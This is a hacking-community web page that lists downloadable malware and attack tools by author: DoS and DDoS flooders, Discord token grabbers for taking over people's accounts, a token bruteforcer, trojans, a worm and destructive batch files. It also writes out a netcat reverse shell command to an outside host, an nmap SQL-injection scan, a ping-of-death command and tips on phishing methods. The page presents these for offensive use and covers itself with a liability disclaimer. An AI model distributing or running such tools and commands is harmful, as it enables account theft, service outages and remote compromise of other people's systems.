Ethical Hacking Society

The Ethical Hacking Society is about ethical hacking as a whole.

Disclaimer

We do not take responsibility for any damage or legal issues with these files here at AT Products LLC, and the other communities at the Ethical Hacking Society, The Script Community, CodingHome, or the Noodle Hackerspace.

Use a virtual machine if it's a computer virus; never open it on your physical machine. As a precaution, download them on your VM.

If it's an APK file, use an emulator.

More information on Virtual Machines (VM)
More information on APK Emulators



Denial of Service


A denial-of-service (DoS) attack is a type of cyber attack in which a malicious actor aims to render a computer or other device unavailable to its intended users by interrupting the device's normal functioning. DoS attacks typically function by overwhelming or flooding a targeted machine with requests until normal traffic is unable to be processed, resulting in denial-of-service to addition users. A DoS attack is characterized by using a single computer to launch the attack.

HTTP Flooder (Python) by Nasus

Requirements (TXT) MHViP (Python) README (MD). These files are a private paid DDPS


Distributed Denial of Service

A distributed denial-of-service (DDoS) attack is a type of DoS attack that comes from many distributed sources, such as a botnet DDoS attack.

SaphryaDDOS (Python) Ping of Death (Python) UDP Flood (Python) by CobraCommander


Token Grabbers

A Token Grabber is supposed to grab people on Discord's tokens, to hack their account.

Token Grabber (Python) by Alex Toucan

Token Grabber (Python) by wodxgod

Token Grabber (Python) by Wever

Token Grabber (7Z) Token Grabber (Python) by CobraCommander

Token Grabber (JavaScript) by CУБΞЯC

Token Bruteforcer (Python) by Social404

Wever Recommends these Steps

Token Grabber.js ss-grabber.js Tutorial



Trojans

From The Script Community: A Trojan horse in cybersecurity is any malware that misleads users of its true intent. It may look legitimate but can take control of your computer. A Trojan is designed to damage, disrupt, steal, or in general inflict some other harmful action on your data or network.

MEMZ Trojan (ZIP | Python) Trojan 1 (BAT) Trojan 2 (BAT) Trojan 3 (BAT) Trojan 4 (BAT) Trojan 5 (BAT) by CobraCommander


Worms

Networm (TXT) by CobraCommander


Other

Doom (EXE) Techno (BAT) VirusCodes (TXT) Doom (BAT | Version 2) Unknown (BAT) Death (BAT) Crash (BAT) Unknown (BAT) Matrix (TXT) Script (BAT) Pinger and DDOS (RAR) MyDOOM_3 by CobraCommander

Reverse Shell Command on Netcat - nc -e /bin/sh 10.0.0.1 1234

Nmap on Kali Linux SQL Injection - nmap --script=http-sql-injection <target>

Ping of Death in “C” - ping <ip address> -t |65500

Social Engineering - "Spearhead phishing is effective but try something like whaling or watering hole" Wireshark is a network protocol analyzer used to capture traffic.

Putting your adapter in Monitor mode, or RFMON mode, allows a computer with a wireless network interface controller to monitor all traffic received on a wireless channel. Unlike promiscuous mode, which is also used for packet sniffing, monitor mode allows packets to be captured without having to associate with an access point

Buy a WiFi Adapter that supports Monitor Mode.

See phishing definitions